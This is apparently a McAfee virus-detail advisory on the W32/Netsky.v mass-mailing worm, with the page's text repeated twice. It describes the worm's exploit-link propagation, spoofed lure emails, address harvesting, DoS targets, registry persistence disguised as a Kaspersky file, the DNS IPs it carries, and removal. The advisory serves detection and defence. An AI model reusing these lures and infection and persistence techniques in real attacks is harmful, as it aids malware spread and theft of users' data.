McAfee > Theat Center > Virus Detail Page

Overview

This is a virus detection. Viruses are programs that self-replicate recursively, meaning that infected systems spread the virus to other systems, which then propagate the virus further. While many viruses contain a destructive payload, it's quite common for viruses to do nothing more than spread from one system to another.

Characteristics

--Update 04/15/2004 08:00 PST
W32/Netsky.v@MM has been updated to low-profiled due to press at http://www.theregister.co.uk/2004/04/15/pesky_netsky/ .

This variant of W32/Netsky is similar to previous variants of W32/Netsky, however the virus does not spread as an email attachment, but rather as a hyperlink pointing to an infected system. It bears the following characteristics:

• infects by spreading exploit script, which automatically downloads and executes the virus from a remote infected system constructs messages using its own SMTP engine
• harvests email addresses from the victim machine
• spoofs the To: and From: address of messages
• opens a port on the victim machine (TCP 5556 & 5557)
• delivers a DoS attack on certain web sites upon a specific date condition

Mail Propagation

Email addresses are harvested from the victim machine. Files with the following extensions are searched:

• .adb
• .asp
• .cfg
• .cgi
• .dbx
• .dhtm
• .doc
• .eml
• .htm
• .html
• .jsp
• .mbx
• .mdx
• .mht
• .mmf
• .msg
• .nch
• .ods
• .oft
• .php
• .pl
• .ppt
• .rtf
• .sht
• .shtm
• .stm
• .tbb
• .txt
• .uin
• .vbs
• .wsh
• .wab
• .xls
• .xml

Constructed messages bear the following characteristics:

To: dimitrihji@yahoo.com  (this is spoofed)
From: dimitrihji@yahoo.com  (this is also spoofed, it is not the true receiving address)
Subject: (taken from the following list)

• Mail Delivery Sytem failure
• Mail delivery failed
• Server Status failure
• Gateway Status failure

Body text: (taken from the following list)

• The processing of this message can take a few minutes...
• Converting message. Please wait...
• Please wait while loading failed message...
• Please wait while converting the message...

Rather than including an attachment, the HTML within the message contains exploit code to contact a remote website to download the infected file.  This HTML script will be detected with 4352 DATs and higher as Exploit-ObjectData.   The remote infected computer is contacted via HTTP on TCP port 5557, the remote HTML file is launched, which drops an FTP "script" that downloads the Netsky.v executable file from the remote machine via TCP port 5556, and proceeds to infect the local machine by executing the downloaded file.

Denial of Service

This worm targets the following remote servers in a denial of service attack:

• www.keygen.us
• www.freemule.net
• www.kazaa.com
• www.emule.de
• www.cracks.am

System Changes

The worm installs itself on the victim machine as KasperskyAVEng.exe in the Windows directory:

• %WinDir%\KasperskyAVEng.exe

The following Registry key is added to hook system startup:

• HKEY_LOCAL_MACHINE\Software\Microsoft\
  Windows\CurrentVersion\Run "KasperskyAVEng" = %WinDir%\KasperskyAVEng.exe

A copy of the worm is saved to disk as SKYAV.TMP in the Windows directory:

• %WinDir%\skyav.tmp

Remote Access Component

The worm opens a web server on TCP port 5557 which, on vulnerable systems, will load an HTM file which is heuristically detected by DATs up to 4352 as Unsafe Script.  Specific detection will be added to the 4352 DATs as Exploit-ObjectData.

The virus also opens an FTP server on TCP Port 5556, so that the infected system can be accessed remotely.

Symptoms

• Outgoing DNS query to one of the following DNS servers (IP list carried within the worm):
  • 212.44.160.8
  • 195.185.185.195
  • 151.189.13.35
  • 213.191.74.19
  • 193.189.244.205
  • 145.253.2.171
  • 193.141.40.42
  • 194.25.2.134
  • 194.25.2.133
  • 194.25.2.132
  • 194.25.2.131
  • 193.193.158.10
  • 212.7.128.165
  • 212.7.128.162
  • 193.193.144.12
  • 217.5.97.137
  • 195.20.224.234
  • 194.25.2.130
  • 194.25.2.129
  • 212.185.252.136
  • 212.185.253.70
  • 212.185.252.73
• Existence of the files/Registry keys detailed above
• TCP ports 5556 & 5557 open on the victim machine

Method of Infection

This worm spreads by email, constructing messages using its own SMTP engine.

Removal

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).

Additional Windows ME/XP removal considerations

Variants

Variants

N/A

All Information

Overview -

This is a virus detection. Viruses are programs that self-replicate recursively, meaning that infected systems spread the virus to other systems, which then propagate the virus further. While many viruses contain a destructive payload, it's quite common for viruses to do nothing more than spread from one system to another.

Characteristics

Characteristics -

--Update 04/15/2004 08:00 PST
W32/Netsky.v@MM has been updated to low-profiled due to press at http://www.theregister.co.uk/2004/04/15/pesky_netsky/ .

This variant of W32/Netsky is similar to previous variants of W32/Netsky, however the virus does not spread as an email attachment, but rather as a hyperlink pointing to an infected system. It bears the following characteristics:

• infects by spreading exploit script, which automatically downloads and executes the virus from a remote infected system constructs messages using its own SMTP engine
• harvests email addresses from the victim machine
• spoofs the To: and From: address of messages
• opens a port on the victim machine (TCP 5556 & 5557)
• delivers a DoS attack on certain web sites upon a specific date condition

Mail Propagation

Email addresses are harvested from the victim machine. Files with the following extensions are searched:

• .adb
• .asp
• .cfg
• .cgi
• .dbx
• .dhtm
• .doc
• .eml
• .htm
• .html
• .jsp
• .mbx
• .mdx
• .mht
• .mmf
• .msg
• .nch
• .ods
• .oft
• .php
• .pl
• .ppt
• .rtf
• .sht
• .shtm
• .stm
• .tbb
• .txt
• .uin
• .vbs
• .wsh
• .wab
• .xls
• .xml

Constructed messages bear the following characteristics:

To: dimitrihji@yahoo.com  (this is spoofed)
From: dimitrihji@yahoo.com  (this is also spoofed, it is not the true receiving address)
Subject: (taken from the following list)

• Mail Delivery Sytem failure
• Mail delivery failed
• Server Status failure
• Gateway Status failure

Body text: (taken from the following list)

• The processing of this message can take a few minutes...
• Converting message. Please wait...
• Please wait while loading failed message...
• Please wait while converting the message...

Rather than including an attachment, the HTML within the message contains exploit code to contact a remote website to download the infected file.  This HTML script will be detected with 4352 DATs and higher as Exploit-ObjectData.   The remote infected computer is contacted via HTTP on TCP port 5557, the remote HTML file is launched, which drops an FTP "script" that downloads the Netsky.v executable file from the remote machine via TCP port 5556, and proceeds to infect the local machine by executing the downloaded file.

Denial of Service

This worm targets the following remote servers in a denial of service attack:

• www.keygen.us
• www.freemule.net
• www.kazaa.com
• www.emule.de
• www.cracks.am

System Changes

The worm installs itself on the victim machine as KasperskyAVEng.exe in the Windows directory:

• %WinDir%\KasperskyAVEng.exe

The following Registry key is added to hook system startup:

• HKEY_LOCAL_MACHINE\Software\Microsoft\
  Windows\CurrentVersion\Run "KasperskyAVEng" = %WinDir%\KasperskyAVEng.exe

A copy of the worm is saved to disk as SKYAV.TMP in the Windows directory:

• %WinDir%\skyav.tmp

Remote Access Component

The worm opens a web server on TCP port 5557 which, on vulnerable systems, will load an HTM file which is heuristically detected by DATs up to 4352 as Unsafe Script.  Specific detection will be added to the 4352 DATs as Exploit-ObjectData.

The virus also opens an FTP server on TCP Port 5556, so that the infected system can be accessed remotely.

Symptoms

Symptoms -

• Outgoing DNS query to one of the following DNS servers (IP list carried within the worm):
  • 212.44.160.8
  • 195.185.185.195
  • 151.189.13.35
  • 213.191.74.19
  • 193.189.244.205
  • 145.253.2.171
  • 193.141.40.42
  • 194.25.2.134
  • 194.25.2.133
  • 194.25.2.132
  • 194.25.2.131
  • 193.193.158.10
  • 212.7.128.165
  • 212.7.128.162
  • 193.193.144.12
  • 217.5.97.137
  • 195.20.224.234
  • 194.25.2.130
  • 194.25.2.129
  • 212.185.252.136
  • 212.185.253.70
  • 212.185.252.73
• Existence of the files/Registry keys detailed above
• TCP ports 5556 & 5557 open on the victim machine

Method of Infection

Method of Infection -

This worm spreads by email, constructing messages using its own SMTP engine.

Removal -

Removal -

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).

Additional Windows ME/XP removal considerations

Variants

Variants -

N/A